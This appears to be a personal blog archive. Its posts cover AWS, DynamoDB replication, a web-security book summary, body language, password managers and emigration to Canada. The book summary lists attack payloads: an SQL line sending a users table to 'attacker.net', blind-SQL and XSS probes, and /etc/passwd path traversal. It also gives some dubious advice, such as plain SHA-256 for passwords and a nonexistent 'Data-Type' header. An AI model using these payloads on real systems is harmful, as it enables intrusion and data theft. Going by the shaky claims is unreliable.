On doing a boomerang to AWS

A boomerang employee is someone who leaves a company and later returns to it. Most of the time it’s done to get a bump in salary without having to go through a promotion process.

I worked for Amazon as a software engineer for four years. I left in 2021.

Last week I got an email from a recruiter in AWS. The conversation can be summarized like this:

  • Recruiter: we miss you and surely you miss us! Do you want to boomerang back to AWS?
  • Me: Maybe, but I want no live coding interviews.
  • Recruiter: sorry, no.

I was… puzzled, to say the least.

Why title the email “do you want to boomerang?” if you are going to make me do interviews as if I were a brand new hire?

And why would you want to interview me as a brand new hire? Why do you need me to go through another coding interview? I publicly admit it, I hate those, for many reasons. But I worked for your company, you know I can code. And I left because I chose to, not because you decided suddenly that my code was not good.

Is it not in your best interest to make the process easier for me? Do you really prefer to hire someone completely new? Do you know how much time it takes a new hire to learn all of the Amazon tools built in-house? I’ll tell you: it’s 6 months to a year at least.

The tech interview process is very broken…


DynamoDB replication

AWS DynamoDB does not follow the same architecture as the Dynamo paper.

If you use standard DynamoDB within a single region, you get single-leader replication. This means that:

  • One leader node handles all the writes.
  • The writes are copied to follower nodes asynchronously.
  • If you send two concurrent writes for the same PK+SK, you need to:
    • either use an optimistic locking strategy to prevent the conflict from happening. (In summary, you add a version attribute to each item and send Conditional Writes)
    • or use a pessimistic locking strategy to prevent the conflict from happening. (In summary, you send a Transaction that will abort if someone else is modifying one of those items)

If you use DynamoDB with global tables enabled, it becomes a multi-active database. This means that:

  • You get one leader node per region.
  • The writes sent to the leader node in one region will be automatically replicated to the nodes in the other regions asynchronously using DynamoDB streams.
  • If you send two concurrent writes for the same PK+SK to two different regions, DynamoDB will use the last-write-wins strategy to resolve the write conflict, so it’s possible to lose some writes. Neither optimistic locking nor pessimistic locking will protect you. A transaction sent to one region does not mean a transaction in the other regions: since the changes are replicated using DynamoDB Streams, the “transaction” aspect is lost.
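Added example (not from the original post) showing both points at once: a version attribute plus a conditional write rejects the losing writer when there is one leader, and the same conditional writes both succeed when sent to two regional leaders, after which last-write-wins reconciliation drops one of them. The `update_item` kwargs are the real boto3 shape; the regional tables, timestamps and account item are constructed in-memory stand-ins so it runs offline.

```python
from dataclasses import dataclass, field
from typing import Dict, Tuple

ItemKey = Tuple[str, str]  # (PK, SK)


class ConditionalCheckFailed(Exception):
    """Stand-in for botocore's ConditionalCheckFailedException."""


def versioned_update(pk: str, sk: str, new_balance: int, expected_version: int) -> dict:
    """Kwargs for boto3's Table.update_item implementing optimistic locking:
    the write applies only if the stored 'version' still equals the value the
    writer read, and every successful write bumps the version by one.
    (Assumes a table keyed by PK/SK with 'balance' and 'version' attributes.)"""
    return {
        "Key": {"PK": pk, "SK": sk},
        "UpdateExpression": "SET balance = :b, version = version + :one",
        "ConditionExpression": "version = :v",
        "ExpressionAttributeValues": {":b": new_balance, ":one": 1, ":v": expected_version},
    }


@dataclass
class RegionTable:
    """Constructed in-memory stand-in for one region's leader node. It evaluates
    only the condition shape built above and stamps each write with a timestamp,
    the way global tables do for their last-write-wins reconciliation."""
    name: str
    items: Dict[ItemKey, dict] = field(default_factory=dict)

    def update_item(self, Key, UpdateExpression, ConditionExpression,
                    ExpressionAttributeValues, *, ts: int) -> dict:
        item = self.items[(Key["PK"], Key["SK"])]
        vals = ExpressionAttributeValues
        if item["version"] != vals[":v"]:  # checked against THIS leader's copy only
            raise ConditionalCheckFailed(
                f"{self.name}: version is {item['version']}, expected {vals[':v']}")
        item.update(balance=vals[":b"], version=item["version"] + vals[":one"], ts=ts)
        return dict(item)


def seed(region: str, balance: int) -> RegionTable:
    """One account item at version 0 in the given region (constructed data)."""
    return RegionTable(region, {("ACCT#1", "BAL"): {"balance": balance, "version": 0, "ts": 0}})


def single_region_race(balance: int = 100) -> dict:
    """Two writers both read version 0 and try to debit. With one leader the
    second conditional write is rejected: that writer must re-read and retry,
    and no debit is silently lost."""
    key = ("ACCT#1", "BAL")
    table = seed("us-east-1", balance)
    table.update_item(**versioned_update(*key, balance - 30, 0), ts=1)
    try:
        table.update_item(**versioned_update(*key, balance - 50, 0), ts=2)
        rejected = False
    except ConditionalCheckFailed:
        rejected = True
    return {"second_write_rejected": rejected, "final": dict(table.items[key])}


def last_write_wins(a: dict, b: dict) -> dict:
    """Global-table conflict rule: the item with the later timestamp wins."""
    return a if a["ts"] >= b["ts"] else b


def global_table_race(balance: int = 100) -> dict:
    """The same two debits, each sent to a different region's leader. Both
    conditions pass, because each region still holds version 0, and when
    stream replication reconciles the two copies with last-write-wins one
    debit disappears without any error being raised."""
    key = ("ACCT#1", "BAL")
    east, west = seed("us-east-1", balance), seed("eu-west-1", balance)
    east.update_item(**versioned_update(*key, balance - 30, 0), ts=1)
    west.update_item(**versioned_update(*key, balance - 50, 0), ts=2)
    winner = last_write_wins(east.items[key], west.items[key])
    east.items[key], west.items[key] = dict(winner), dict(winner)  # both regions converge
    return {"converged_balance": winner["balance"],
            "balance_if_both_applied": balance - 30 - 50}


if __name__ == "__main__":
    print(single_region_race())
    print(global_table_race())
```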

The Web Application Hacker’s Handbook

(The book and the answers to the questions at the end of each chapter.)

Phew, this book took forever to finish. This is my attempt to summarise a 900+ page book 🙂

Introduction

  • Vulnerabilities in web apps arise because of one core problem: users can submit arbitrary input. Apps make themselves vulnerable by transmitting data via the client assuming that it will not be modified and by relying on client-side checks.
  • Canonicalization is the process of converting or decoding data into a common character set.

Chapter 2: Core defense mechanisms

  • Defense #1: Authentication
  • Defense #2: Session management. Create a session for each user and issue a token identifying the session. The session data itself is stored on the server. When the user receives the token, the browser automatically submits it back to the server on each HTTP request.
  • Defense #3: Access control

Chapter 3: Web application technologies

  • HTTP uses TCP connections but each request and response may use a different TCP connection.
  • HTTPS is the same as HTTP but it uses TLS.
  • Some HTTP headers:
    • Host: mandatory in HTTP 1.1, indicates the server to which the client is making the request
    • Server: indicates the software on the server (may or may not be accurate)
    • Pragma (HTTP 1.0) and Cache-Control (HTTP 1.1) tell the client not to store the response in the cache
    • Connection: tells the other end of the communication whether it should close the TCP connection or if it should keep it open
    • Content-Type: the client telling the server what type it’s sending
    • Accept: the client telling the server what type it wants back
    • Data-Type: the server telling the client what type it’s sending
    • If-Modified-Since: the client telling the server when it last received the resource
    • If-None-Match: the client giving the server an entity tag. The server uses this to determine whether the client can use its cached copy of the resource.
    • Origin: in AJAX calls, the client telling the server the domain from where the request is coming from
    • Access-Control-Allow-Origin: the server telling the client whether the resource can be retrieved via AJAX calls.
    • X-Forwarded-For: contains the original IP address of the client, in case there is a proxy sitting in the middle of the client and the server.
  • HTTP methods:
    • HEAD: similar to GET but the server should not return a response body, just the headers.
    • OPTIONS: the server reports the HTTP methods that are available for a resource. It should respond with an “Allow” header
  • Cookies attributes
    • expires: sets a date until which the cookie is valid
    • domain: to which the cookie is valid. It must be the same or a parent of the domain from which the cookie is received
    • path: the URL for which the cookie is valid
    • secure: the cookie will only be transmitted in HTTPS requests
    • HttpOnly: the cookie cannot be accessed via client-side JavaScript
  • Cookies are sent to the main domain and any sub-domains.
  • In the client, JavaScript can access current URL and cookies
  • The same-origin policy is designed to keep content that came from different domains from interfering with each other. Content received from one website can read and modify other content received from the same site, but is not allowed to access content received from other sites.

Chapter 4: Mapping the application

Chapter 5: Bypassing client-side controls

  • Cookies and hidden HTML form fields are not shown but they are accessible and modifiable by clients. Don’t store critical data in them.
  • Query strings should NOT be used to transmit sensitive information because URLs with query strings are stored in many places (e.g. the browser’s history and server logs). Plus these URLs (and tokens) can appear in Referer headers.
  • Replay attacks: to re-use some critical information (e.g. an encrypted item price) and re-send it in a separate request (e.g. to purchase an expensive product with a lower price)
  • The only secure way to validate client-generated data is on the server.

Chapter 6: Attacking authentication

  • Always hash passwords with a user-specific random salt so that if two users have the same password, they won’t have the same hashed password. The salt can be stored in plaintext.
  • Always use strong hash functions like SHA-256.
  • When trying to attack authentication, look everywhere: main login forms, register new accounts, change passwords, remember passwords, recover forgotten passwords, and impersonate other users.
  • Session fixation: an attacker feeds a known session to a user, waits for them to log in, and then hijacks their session. If an app doesn’t issue a fresh token following a successful login, it is vulnerable to session fixation. Never send tokens in URLs.
  • If a client has cookies disabled, store tokens in hidden HTML fields.
  • Always send tokens through HTTPS.
  • Cross-site request forgery attacks: an attacker makes a crafted request to an application from a website he controls, and he exploits the fact that the victim’s browser automatically sends her current cookie with this request. For this reason, never have GET requests change server data.
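The salted-storage scheme from the first two Chapter 6 bullets, as an added example (not from the book or the post). It keeps the summary's layout (random per-user salt stored in plaintext next to the digest) but runs SHA-256 through PBKDF2 rather than a single hash call, because a salt alone does not slow down offline guessing; the iteration count is a constructed demo value.

```python
import hashlib
import hmac
import os
from typing import Dict, NamedTuple, Optional

ITERATIONS = 200_000  # demo value; tune to your latency budget in production


class StoredCredential(NamedTuple):
    salt: bytes    # random and per user; may be stored in plaintext
    digest: bytes  # PBKDF2-HMAC-SHA256(password, salt)


def hash_password(password: str, salt: Optional[bytes] = None) -> StoredCredential:
    """Derive a digest with a fresh 16-byte random salt (or a supplied one,
    e.g. when re-checking an existing record)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return StoredCredential(salt, digest)


def verify_password(password: str, stored: StoredCredential) -> bool:
    """Re-derive with the stored salt and compare in constant time, so a wrong
    guess takes the same time regardless of where the first differing byte is."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), stored.salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored.digest)


def register_users(plaintexts: Dict[str, str]) -> Dict[str, StoredCredential]:
    """Hash every user's password with its own salt (constructed input)."""
    return {user: hash_password(pw) for user, pw in plaintexts.items()}


def same_digest(users: Dict[str, StoredCredential], a: str, b: str) -> bool:
    """True only if two stored records carry identical digests; with per-user
    salts this stays False even when the two users chose the same password."""
    return users[a].digest == users[b].digest


if __name__ == "__main__":
    db = register_users({"alice": "correct horse", "bob": "correct horse"})
    print("same digest:", same_digest(db, "alice", "bob"))
    print("alice ok:", verify_password("correct horse", db["alice"]))
```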

Chapter 7: Attacking session management

  • You can bypass logins and masquerade as other users without knowing their credentials
  • If an app encrypts data that plays a key role in its functionality, try the bit-flipping technique to see whether it’s possible to manipulate the encrypted information to interfere with the app’s logic.

Chapter 8: Attacking access controls

  • Types of attacks:
    • Vertical privilege escalation: a user can do things that his role doesn’t allow him to
    • Horizontal privilege escalation: a user can view or modify resources that they shouldn’t be allowed to, like e-mails from other users.
    • Business logic exploitation: for example, bypassing the payment step in a checkout sequence.
  • If the app is using RBAC, roles defined may be incomplete.

Chapter 9: Attacking data stores

  • In native compiled languages, the injected payload contains machine code rather than instructions in that language.
  • Because of how interpreted languages are executed (SQL, PHP), code injection can happen.
  • Most databases implicitly cast an integer to a string
  • In SQL, ORDER BY 1 orders by the first column
  • If you are going to probe for SQL injections, ask the owner of the database to do a full backup because some attacks can destroy data.
  • If a SQL query expects a 2, try sending 1+1 or 67-ASCII('A')
  • If a SQL query expects an A, try sending ASCII('A')
  • To find out what database you are attacking, try concatenating strings
    • Oracle: 'serv' || 'ices'
    • MSSQL: 'serv' + 'ices'
    • MySQL: 'serv' 'ices'
  • If you don’t know the value of a particular field, you can do SELECT NULL for that field because NULL can be converted to any data type
  • In MSSQL, the metadata table information_schema.columns has details of all tables and columns
  • One way of getting data from a database is to create an “out of band” channel: create a network connection back to your own computer. For example: SELECT * INTO OUTFILE '\\\\attacker.net\\share\\output.txt' from users;
  • When a database evaluates a SELECT X FROM Y WHERE C query, if condition C is never true, expression X is never evaluated. This can be used as follows: use the presence or absence of an error to test an arbitrary condition. For example: SELECT 1/0 FROM users WHERE (SELECT username FROM users WHERE username = 'admin') = 'admin'. If the user exists, the expression 1/0 is evaluated and it will throw an error.
  • Time delays: if select(user) = 'admin' waitfor delay '0:0:5' will cause a delay of 5 seconds if the current database user is ‘admin’.
  • Use https://sqlmap.org/ to attack databases.
  • Defenses:
    • Use parameterized queries in every database query.
    • If an application only needs read access, don’t use an account that has write access.

Chapter 10: attacking back-end components

  • Injecting OS commands can be done by supplying input that has shell metacharacters, for example pipe to redirect process outputs, ampersand to batch multiple commands
  • In PHP and Javascript, the eval function can be used to execute any code
  • Trying a time delay attack is the most reliable way to detect if command injection is possible. For example: ping -i 30 127.0.0.1
  • Path traversal vulnerabilities arise when the application uses user input to access files and directories. For example, submitting images/../../etc/passwd
  • If an application checks file extension, try adding a null byte at the end of the file you want, followed by the extension that the application wants. Example: ../../etc/passwd%00.jpg
  • Defenses:
    • Reject any requests that have backslashes or forward slashes, or null bytes
  • Remote file inclusion is possible in PHP with the include function and XML with external entities
  • Server-side HTTP redirection can be exploited to use a vulnerable application as a proxy to attack other sites – the traffic will appear to come from the vulnerable application

Chapter 11: attacking application logic

  • n/a

Chapter 12: attacking users with cross-site scripting

  • XSS is the number one threat on the internet
  • 3 varieties:
    • reflected: an attacker crafts a request containing embedded Javascript that is reflected to any user who makes the request
    • stored: data submitted by an attacker is stored in the application and then displayed to other users without being sanitised
    • DOM-based: an attacker crafts a URL containing Javascript code, which is then written to the page and executed in the same way as if the server had returned it
  • Cookies can only be accessed by the domain that issued them
  • Spear phishing: compromise the session of a specific user
  • To identify XSS vulnerabilities: use "><script>alert(document.cookie)</script>
  • Defenses:
    • validate input
    • validate output
    • eliminate dangerous insertion points. Never insert user input into script code, or put user input in tag attributes that can take URLs

Chapter 13: attacking users with other techniques

  • Same-origin policy: website X can issue requests to website Y, but it cannot process the response. So… it can do GET requests! In order to do anything else, website X must do a preflight request and website Y must respond with Access-Control-Allow-Origin headers.
  • Browsers automatically submit cookies on every request
  • Request forgery: attackers exploit the normal behavior of web browsers to hijack a user’s token, causing it to make requests that they didn’t intend. These attacks normally require the user to be logged in
    • Defense: supplement HTTP cookies with additional server-generated tokens, like a hidden field in an HTML form
  • UI redress attack (“clickjacking”): an attacker’s web page loads a target application within an iframe.
    • Defense: use the X-Frame-Options response header with value deny or sameorigin
  • Javascript hijacking
    • Add for(;;) in every script returned by the server that is going to be processed as part of an AJAX response
  • HTTP header injection when an attacker can inject headers and newlines, so… additional headers.
  • HTTP response splitting attack to poison a proxy server cache
  • Session fixation: when an attacker is able to take over a victim’s session
    • Defense: when a user logs in, give them a fresh session token, don’t reuse the first one that they were given while they were still anonymous
  • Other defenses:
    • Use caching directives to prevent browsers from storing sensitive data
    • Never use URLs to transmit sensitive data
    • Use autocomplete=off on fields that store sensitive data

Chapter 14: Automating Customized Attacks

  • Three main situations in which automated techniques can help attack an application:
    • Enumerating identifiers
    • Harvesting data
    • Fuzzing: generating huge numbers of requests containing common attack strings
  • Burp can trap requests
  • Burp Intruder can fuzz requests. The most used attack is the sniper attack, which can fuzz one payload position at a time
  • Burp Repeater can be used to analyze interesting results

Chapter 15: Exploiting information disclosure

  • Always monitor application responses to identify any error messages that may contain useful information. Database errors should always be masked.

Chapter 16: Attacking native compiled applications

  • Native execution environments (C, C++) have manual management of the heap and are therefore prone to buffer overflows, integer vulnerabilities and format string bugs
  • Managed execution environments (Java, C#) don’t have those issues
  • Stack overflows occur when, for example, you try to strcpy() into a buffer that is too short. If the buffer is overflowed, the attacker can potentially overwrite the address of the next function to be executed.
  • Heap overflows are less straightforward to exploit. The attacker can potentially overwrite the control structure of an adjacent heap block in memory. This may result in an execution crash at a later point
  • Off-by-one errors occur when an attacker can write a single byte beyond the end of an allocated buffer, which enables them to take control of the flow of execution, and the application may return more data than it should. (In languages like C, the end of a string is indicated by a null byte; if it’s missing, reading continues as far as the next null byte)
  • To detect buffer overflow vulnerabilities, send long strings of data and monitor for error results
  • Integer overflows occur when, for example, a variable of type short (16 bits) tries to hold the number 2^16. The program adds 1 and the value wraps to become 0.
  • Signedness errors occur when signed and unsigned variables are compared. Negative values are treated as large positive numbers.
  • Format string vulnerabilities occur when user input is used as the format string parameter of a function like printf in C. The most dangerous specifier is %n, which causes the number of bytes output so far to be written to the address of the pointer. If the user passed fewer variables than parameters in the format string, the code will not detect it and will continue processing parameters from the call stack.

Chapter 17: Attacking application architecture

  • Defects in an application’s architecture can enable attackers to escalate an attack, moving from one component to another. For example, if the application is vulnerable to OS command injection, and the application and the database live in the same machine, it may be possible to access data in the database.

Chapter 18: Attacking the application server

  • Defects in an application server can enable attackers to access directory listings, source code for executable pages, sensitive configuration data, and the ability to bypass input filters.

Chapter 19: Finding vulnerabilities in source code

  • White-box testing involves looking inside the source code
  • Many vulnerabilities can be discovered more quickly through black-box testing

Chapter 20: toolkit

  • Tools needed for almost all hackers:
    • Proxy interceptors like Burp Suite that can capture requests and responses and modify them
    • Standalone scanners, like Stackhawk, which probe for common vulnerabilities

Chapter 21: methodology


AWS Networking Concepts

Before March 2023 I couldn’t for the life of me understand what was going on in the AWS VPC dashboard. I mean, look at the length of the scrolling bar on the left-hand panel!

So, with the goal of figuring out the various resources involved in networking, I read (most of) this book: AWS Networking Fundamentals, by Toni Pasanen.

My first thought after finishing it was this: there are so many resources involved because there are a lot of types of connections you can have. AWS account to on-premise, account to account, VPC to VPC, subnet to subnet, VPC to internet, VPC to specific AWS services…

So anyway, I made this mind map to link all pieces together (Lucidchart link):

Let me know if you find it useful and/or if you find any errors!


What every body is saying

Non-verbal communication is a big chunk of how we communicate. The following is a summary of the book What Every Body is Saying that I read a few years ago.

Body part | Action | Explanation | Causes
--- | --- | --- | ---
Arms | Leap and thrust arms in the air | They feel good or confident | Gravity-defying actions are a common response to joy and excitement
Arms | Arms sink | They feel down |
Arms | Arms freeze around certain people; especially seen on abused kids | They try not to draw attention to others | Limbic system’s freeze response
Arms | Arms behind their backs | Higher status display and isolating signal | Territorial display, when we are confident we spread out
Arms | Arms form a V shape displaying all the fingers | They are confident and unwilling to be bullied | Territorial display, when we are confident we spread out
Arms | Arms form a V shape displaying only one finger | They are inquisitive and concerned | Territorial display
Arms | Interlaced hands behind the head | They are comfortable and dominant | Territorial display, when we are confident we spread out
Body | Freeze | They feel threatened or exposed | Freeze, fight or flight
Body | Turtle effect: shoulders rise toward the ears | They suddenly lose confidence or are uncomfortable | When we are insecure, we tend to take up less space
Body | Leaning away from somebody | They disagree or feel uncomfortable around each other | Self defense mechanism: protecting internal organs (heart, liver, stomach, etc.)
Body | Self hug | Pacifying behaviour, response to stress | Similar to the way a mother hugs a young child
Body | Feet and legs splay out | They are becoming increasingly unhappy | Claim greater territory, indifference to authority, disrespectful
Body | Overall lack of personal hygiene and grooming | They are sad or ill | The brain has other priorities than personal appearance
Chest | Puffing out the chest | Trying to establish territorial dominance |
Eyes | Eye blocking (using one or both hands, or an object), squinted eyes | Display of consternation, disbelief or disagreement |
Eyes | Eyes wander all over the room | They are disinterested or feel superior |
Eyes | Pupil contraction | They have seen something they don’t like | Pupils contract so that we can see clearly and accurately in order to defend ourselves
Eyes | Pupil dilation | They have seen something they like | Pupils dilate to let in the maximum amount of light and send more information to the brain
Eyes | Raise or arch eyebrows | They have seen something they like | Gravity-defying actions are a common response to joy and excitement
Face | Rubbing of forehead | Pacifying behaviour, response to stress |
Face | Exhale with puffed out cheeks | Pacifying behaviour, response to stress |
Face | Excessive yawning | Pacifying behaviour, response to stress |
Feet | Happy feet: feet wiggling or bouncing | High confidence signal |
Feet | Feet point at you | The welcome is genuine, they want to talk to you |
Feet | Feet point away from you | They don’t want to be around you anymore |
Feet | Feet make an L shape, one pointed at you, the other 90° | They want to talk to you but they have to be somewhere else |
Feet | Toes point upward | The person is in a good mood or thinking or hearing something positive | Gravity-defying actions are a common response to joy and excitement
Feet | Feet shift from flat footed to the “starter’s position” | The person is ready to do something physical |
Feet | Feet touching | There is a positive connection between two people |
Feet | Feet shift from jiggling to kicking | They have seen something negative | Kicking is a subconscious way of fighting the unpleasant
Feet | Feet shift from wiggles to freeze | They are under stress or feel threatened | Tendency of an individual to stop activity when faced with danger
Feet | Turn toes inward or interlock feet | They feel insecure, anxious or threatened | People tend to restrict arm and leg movements when lying
Fingers | Fingers planted spread apart on a surface | They are comfortable and dominant | Territorial display, when we are confident we spread out
Hair | Play with hair | Pacifying behaviour, response to stress |
Hands | Hands hidden behind something, under something, or in pockets, when talking to someone | DON’T DO IT: People get the impression they are unfriendly and hiding something |
Hands | Finger pointing | DON’T DO IT: People think it is very rude and offensive |
Hands | Self-grooming when others are talking to you | DON’T DO IT: People think it is a sign of dismissiveness |
Hands | Nail-biting | DON’T DO IT: Sign of insecurity or nervousness | Pacifying behaviour
Hands | Shaky hands | They are very excited or very nervous |
Hands | Touching the spread fingertips of both hands, as if praying | They are very confident |
Hands | Hand-wringing | They are stressed or concerned |
Hands | Thumb up; thumbs sticking out of the pocket | They are very confident |
Hands | Thumbs hidden, thumbs in pocket but lets fingers hang out on the side | They are not confident |
Hands | Using the hands to frame the genitals | They are very confident | Dominance display with emphasis on the sexual
Hands | Stroke fingers across palm or rubbing hands together | Pacifying behaviour, response to stress |
Hands | Fingers interlace to rub up and down | Pacifying behaviour, response to stress |
Head | Head tilt | They are comfortable, receptive and friendly | We expose our most vulnerable area, the neck
Knees | Clasping of the knees | The person wants to get up and leave |
Legs | Leg cleansing: hands on top of legs and slide them toward the knee | Pacifying behaviour, response to stress | Dries sweaty palms and pacifies through tactile stroking
Legs | Legs crossed while standing | They feel comfortable or confident; they tilt toward the person they like the most | Balance is reduced significantly because they are standing on one foot
Mouth | Lip compression, press lips to make them disappear | There is stress or anxiety | We are not allowing anything else into our bodies
Neck | Neck touching and/or stroking, playing with a necklace, adjusting tie | Pacifying behaviour, response to stress |
Neck | Ventilator: pulling the fabric of the neck away from the skin | Pacifying behaviour, response to stress |
Shoulders | Partial shrugs | Lack of commitment or insecurity |
Shoulders | Both shoulders shrug sharply and equally | Lack of knowledge, but they confidently support what they are saying | Gravity-defying actions are a common response to joy and excitement
Sounds | Whistling | Pacifying behaviour, response to stress |
Stomach | Upset stomach | Response to a stressful situation | During emergencies there is no time for digestion, the body prepares for escape or physical conflict
Torso | Body turns away from somebody or something | They can’t handle what they are seeing | The ventral side is the most vulnerable side of the body, so the limbic brain has an inherent need to protect it from things that can harm us
Torso | Crossing of the arms or use of an object to cover the torso (pillows) | Discomfort of the situation | The ventral side is the most vulnerable side of the body, so the limbic brain has an inherent need to protect it from things that can harm us
Torso | Torso bow | Regard and respect for others | Let the higher-status person know that his position is clear
Torso | Stooping as walking or standing | They are mentally depressed | The weight of the world bringing them down
Eyes | Increased blink rate | They are aroused, troubled or nervous |
Face | Tilted head and side glance or brief roll of the eyes | They are distrustful or unconvinced |
Mouth | Real smile: the corners of the mouth point toward the eyes | They are truly happy |
Mouth | Lips pursed as if prepared to kiss | They disagree with something or someone |
Mouth | Sneer | They don’t respect you or your thoughts |
Mouth | Excessive lip licking, mouth touching | They are stressed or concerned | Pacifying behaviour
Mouth | Tongue jutting (placing tongue between teeth, without touching the lips) | They were caught doing something they shouldn’t, or they got away with something |
Nose | Nasal wing dilation | They are aroused | Provides oxygenation
Face | Crinkle nose | They are disgusted |
Face | Chin pointed upward | They are comfortable and confident |
Face | Chin pointed downward | They are insecure |
Body | Sitting on a chair and holding onto it like an ejector seat | They are stressed or uncomfortable |
Hands | Palms-up position (showing the palms) | They want to be believed or accepted |
Hands | Palm down position | They are confident about what they are saying |

People’s thoughts on password managers

A co-worker shared this article from The Guardian with me: Not using a password manager? Here’s why you should be…

And suggested that we read the comments. So I did.

The man’s got a point. I think the industry is heading in that direction. Both my phone and my laptop have fingerprint readers and I use them daily.
I genuinely don’t know whether this is possible.
This person assumes that finding someone’s email is hard. They must not have many friends…

This manager only has one or two passwords to remember, apparently. I have 246.

Okay so it has happened to me MANY TIMES that I forgot the key to my apartment in my apartment’s door. Can you imagine what trouble I’d be in if I forgot my magic notebook somewhere?

Password managers need to do a better job of explaining how their product works. Good luck explaining one-way hashing functions 🙂
“Trust in your own ability”… Ah yes, why should I keep my money in the bank? My desk drawer is perfectly safe!
Damn I forgot this was the 1900s when internet cafes were still a thing.

I chuckled.

I nearly choked on my coffee.


ELI5: AWS Partitions

A Partition is a group of AWS Region and Service objects. There are currently five partitions:

  1. AWS: all standard commercial regions.
  2. AWS-cn.
    • Codes ZHY and BJS.
    • Has its own different domain, www.amazonaws.cn, and the Amazon Resource Name (ARN) syntax includes cn (arn:aws-cn:…).
    • Its regions have no direct connectivity with AWS global.
    • You need a legal entity registered in China to open an account.
  3. AWS-us-gov. (GovCloud)
    • Codes OSU and PDT.
    • To serve the needs of federal, state, and local government agencies.
    • Operated by US citizens on US soil.
    • Lacks some services.
    • Uses endpoints that are specific to AWS GovCloud and are publicly available from the Internet but are accessible only to AWS GovCloud customers.
  4. AWS-iso: secret government data.
    • Code: DCA
    • Launched in 2017.
    • Can operate workloads up to the Secret U.S. security classification level.
    • It can be used by any government agency.
  5. AWS-iso-b: top secret government data.
    • Code: LCK
    • Launched in 2014.
    • It’s not part of the public internet, but is air-gapped from the internet, providing maximum security.
    • Was built by AWS but is hosted on-premise at the CIA.

Definitive guide to fixing sync issues between Android phones & Fitbit Charge 2

Setup:

Problem: when using the Fitbit’s connected GPS functionality, your runs or bike rides show incorrectly on the map (gaps in data, straight lines, etc.)


Solution:

  1. Ensure your phone & Fitbit have the latest updates.
  2. Let your Fitbit drain & die.
  3. If you have the Fitbit app on your phone:
    1. Remove the connection to your Fitbit.
    2. Uninstall the Fitbit app.
  4. In your phone’s Bluetooth settings, remove your Fitbit.
  5. Restart your phone.
  6. Charge your Fitbit to full capacity and leave it charging.
  7. Install the Fitbit app and add the Fitbit.



11.282 km

Today's idea is to tell the story of how I emigrated from Argentina to Canada. Many people ask me about it, and I wanted to share it.

The lead-up

The odyssey began when a friend (mental note: buy him a gift) told me he had received an email from Amazon inviting him to a hiring event in Buenos Aires. He said he didn't want to go and asked me if I was interested. The only requirements I remember them asking for were being able to speak English, having a degree, and having at least 3 years of experience. It didn't take me long to tell my friend to forward me that email.

A few days after sending my CV, I received a link to an online exercise that I had to solve in 2 hours. It was actually two exercises: one very easy, and another difficult one that I couldn't solve. I submitted my answers, certain that they would never get back to me.

The next day I got an email from Amazon HR saying they wanted to do a phone interview with me. The call lasted half an hour; they asked me some basic questions about algorithms and data structures.

A few days later I got another email saying I had made it to the final stage: a round of in-person interviews at the Palacio Duhau. They also sent me another document with "tips" on how to prepare for the interviews. This is no mystery: it is well known that Amazon has a very particular way of interviewing.

The interviews

The event was scheduled for January 2017. I had a month to prepare; during that time I thought hard about two or more examples for each of the Leadership Principles, practiced online on FireCode.io with exercises of all kinds, and read a good part of Cracking the Coding Interview.

Even though I wasn't working, the month flew by and the day of the interviews arrived. I think I can say with certainty that I had never been so nervous in my life. I had already done phone interviews in English, but never in-person ones. When I got to the interview venue, there were about 10 other people waiting besides me.

There were 4 or 5 interviews (I don't remember), one after the other, 50 minutes each. The structure was always the same: 15 minutes talking about myself and giving examples of Leadership Principles, 30 minutes doing an exercise, and 5 minutes where I could ask questions. Honestly, I don't remember what each exercise was about; I only remember two: one where I had to design a system, and another of programming on a whiteboard. The others I don't remember, it all went by very fast… ironically, I do remember that when it was all over, I got into the car to go home and fell asleep in the back seat.

Amazon promises that 95% of candidates receive an answer within 5 business days of their interviews. Well… in my case it was several weeks. On February 22, 2017 at 1:27 a.m., I got an email letting me know that they were extending me an offer to work full-time at the Vancouver, BC offices. I sent my acceptance of the offer a week later. Needless to say, I was thrilled 🙂

The lead-up to the adventure

In the emails following the offer, they told me that Amazon would take care of everything, but I had to give them all the paperwork.

One of the biggest headaches was getting my university degree (thanks, UBA!). My degree was still being processed, and I absolutely needed the official one, so I had to move heaven and earth to get them to let me do a private graduation oath before leaving.

I also had to send proof that I could speak English. Luckily I had already taken exams (IGCSE), so I used those, but in general, if you don't have proof, they make you take the IELTS General. (I had to take that one once I was already in Canada, to apply for permanent residence.) I also had to wait for a background check to be done: they called my previous employers to verify that I hadn't lied on my CV.

Once I had gathered all of that, plus the recommendation letters from my former employers, plus a medical exam, Amazon (well, not Amazon, a company specializing in immigration paperwork) took care of preparing a document called an LMIA (Labour Market Impact Assessment) which, in short, describes me and is meant to show that by hiring me they are not taking a job away from Canadians.

Then there was the matter of the move. Luckily, I had nothing to move or sell; it was just me and my clothes. (My pet stayed in Buenos Aires.) Amazon had offered me two options: either they took care of everything (for example, renting a container and booking hotels) and I never saw a cent, or they did nothing but gave me a sum of money so I could sort it out myself. Naturally, I chose the second option, and with it I paid for the flights and a month's stay in an Airbnb while I looked for a permanent apartment.

The adventure begins…

On June 17, 2017 I landed in Vancouver. At the airport I had to present the LMIA. Right then and there they gave me the famous work permit, which allowed me to work for Jeff (and only for Jeff) for 2 years. The work permit was taken away in 2019 when I applied for permanent residence (which, between us, is only good for two things: being able to change employers at will, and later applying for citizenship).

The rest is the story of life in Vancouver, but that's for another post. Until next time!

PS: the title of this post is the exact distance between my home in Buenos Aires and my home in Vancouver 🙂


Don't Say "Hello" Over Chat!

This article is a Spanish-language adaptation of nohello.com.

Please don't just say "hello" over chat.

For example:

– Pedro: Hello
– Tomas: Hello
Tomas waits while Pedro types his question…

– Pedro: I want to do this but I don't know how…
– Tomas: Ah, what you have to do is…

Tomas had two interruptions: one to say hello, and another to answer the question. It's as if Pedro had called Tomas on the phone, said "hello", and then hung up, and then called him back with the question.

Instead, do this:

– Pedro: Hi Tomas, I want to do this but I don't know how…
– Tomas: Ah, what you have to do is…

Notice how Pedro got his answer much faster, and Tomas didn't have two interruptions.

In the first example, Pedro tried to be "polite" and greeted the person first, as he would in a face-to-face conversation or on the phone. But chat is neither real life nor the phone. Typing on a keyboard takes much longer than speaking. Your attempt to be polite resulted in a loss of productivity for the person you asked the question.

The same goes for messages like "Hi, are you there?" or "Hi, got a second?". Just ask the question!

And finally, supposing Pedro and Tomas are in different time zones:

– Pedro: Hello
(8 hours later)
